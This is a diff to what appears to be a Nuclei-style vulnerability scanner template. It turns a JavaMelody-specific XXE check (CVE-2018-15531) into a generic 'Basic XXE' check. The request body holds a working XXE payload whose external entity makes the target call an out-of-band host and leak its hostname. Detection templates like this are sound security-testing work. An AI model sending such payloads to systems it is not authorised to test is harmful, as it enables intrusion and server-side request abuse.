--- a/vulnerabilities/generic/basic-xxe.yaml
+++ b/vulnerabilities/generic/basic-xxe.yaml
@@ -1,6 +1,6 @@
-id: CVE-2018-15531
+id: Basic XXE
 info:
-  name: CVE-2018-15531 XXE JavaMelody
+  name: Basic XXE
   author: act1on3
   severity: high
 requests:
@@ -9,7 +9,7 @@ requests:
       - '{{BaseURL}}/'
     headers:
       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
-      Content-Type: application/soap+xml
+      Content-Type: application/xml
     body: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % ext SYSTEM "http://{{Hostname}}.h5n1tbn8qh6qe06dpnfx2xng47axym.c.act1on3.site"> %ext;]><r></r>'
     matchers:
       - type: word
